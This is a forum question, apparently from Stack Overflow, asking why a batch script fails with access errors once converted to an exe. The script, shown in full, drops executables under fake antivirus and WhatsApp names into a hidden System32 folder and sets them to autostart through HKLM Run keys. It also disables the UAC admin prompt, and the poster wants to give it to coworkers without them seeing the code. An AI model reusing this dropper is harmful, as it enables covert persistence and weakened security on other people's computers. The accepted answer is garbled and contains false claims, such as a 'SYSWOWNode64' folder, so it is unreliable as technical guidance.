# Why dosen't my batch file copy it to the correct location?

Tags: windows, batch-file, cmd

This issue is eating my brains of. I have a simple batch file which makes a directory in `%SYSTEMROOT%` only if it does not exist & copies certain files to that directory, adds the attribute `+S +R +H` to them, adds two programs to startup via registry and disables UAC as I need it frequently like 3x day. It works well as a batch file but I want to distribute it to my fellow company mates. We all are having a competition in this so I do not need them to see my code; I know if I am still at the level of batch scripting than my code is not worth copying but my mates are also not the brightest bulbs!

My issue is that when I convert it to exe using `Quick Batch Convertor` as the moment it becomes an exe it starts giving `Access denied error` only when It gets to copy the files in `%SYSTEMROOT%` even though I am running it as administrator and the disabling UAC command, which is `C:\Windows\System32\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f`  works, which, originally should require admin privileges. Its only the the copying of files that give access denied when converted into exe. They all just work fine if it is in a form of batch.I know that this might be off topic but I suspect foul play on the batch file and not the `Quick Batch Converter` because I have converted many files using this converter an they worked flawless.

The code for my batch is here

```
@echo off
echo %CD%
cd %~dp0
Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Update"     /t REG_SZ /d     "\"C:\Windows\System32\SystemSettingsUpdate\HL~Realtime~Defense.exe\"  " /f
Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v     "Antivirus-Update " /t REG_SZ /d     "\"C:\Windows\System32\SystemSettingsUpdate\Configure.exe\"  " /f 
if not exist "%SYSTEMROOT%\system32\SystemSettingsUpdate" mkdir         %SYSTEMROOT%\system32\SystemSettingsUpdate
cd %~dp0
taskkill /f /im configure.exe
copy "%~dp0HL~Realtime~Defense.exe"     "%SYSTEMROOT%\system32\SystemSettingsUpdate"
copy "%~dp0Whatsapp,Inc.exe" "%SYSTEMROOT%\system32\SystemSettingsUpdate"
copy "%~dp0Configure.exe" "%SYSTEMROOT%\system32\SystemSettingsUpdate"
ATTRIB +H -R +S %SYSTEMROOT%\system32\SystemSettingsUpdate\Configure.exe
ATTRIB +H -R +S %SYSTEMROOT%\system32\SystemSettingsUpdate\Whatsapp,Inc.exe
ATTRIB +H -R +S             %SYSTEMROOT%\system32\SystemSettingsUpdate\HL~Realtime~Defense.exe


C:\Windows\System32\cmd.exe /k %windir%\System32\reg.exe ADD             HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v                     ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f  
exit
```

Any Suggestions?

Comment: Possible duplicate of [Having troubles with batch files](http://stackoverflow.com/questions/35635431/having-troubles-with-batch-files)

Answer (score 0, accepted):

Exact Duplicate of my question

See first you need to understand how a compiler works. Compiler may also be a horribly written or may be trojan. It is rare that a good compiler is made that works and is not marked as a trojan. I would recommend to start learning other languages such as C# or Python which have in-built exe convertor. So now as I said most exe Convertors can only run PURE DOS commands. Secondly There is a built in app that was modified In later versions of Windows known as UAC. From Windows 10 onwards not a single app without Perfect details that provides its Author and blah blah can be granted Full Administrator Rights until, you add an exception, by default. Then comes the 32 and 64 bit part. There are two versions of CMD from Windows 8 Onwards. One which is in `C:\Windows\SYSWOWNode64` and one in `C:\Windows\System32` So, If you have a 64 bit computer check for the folder in both locations. There are many more factors that play but I will wait until You Provide sufficient deatilas about what `OS` , `64 Bit or 32 bit` computer you have and did you check in both locations so that it will narrow down my search

Regards

Comment: Thank you I got it it in SYSWOWNode64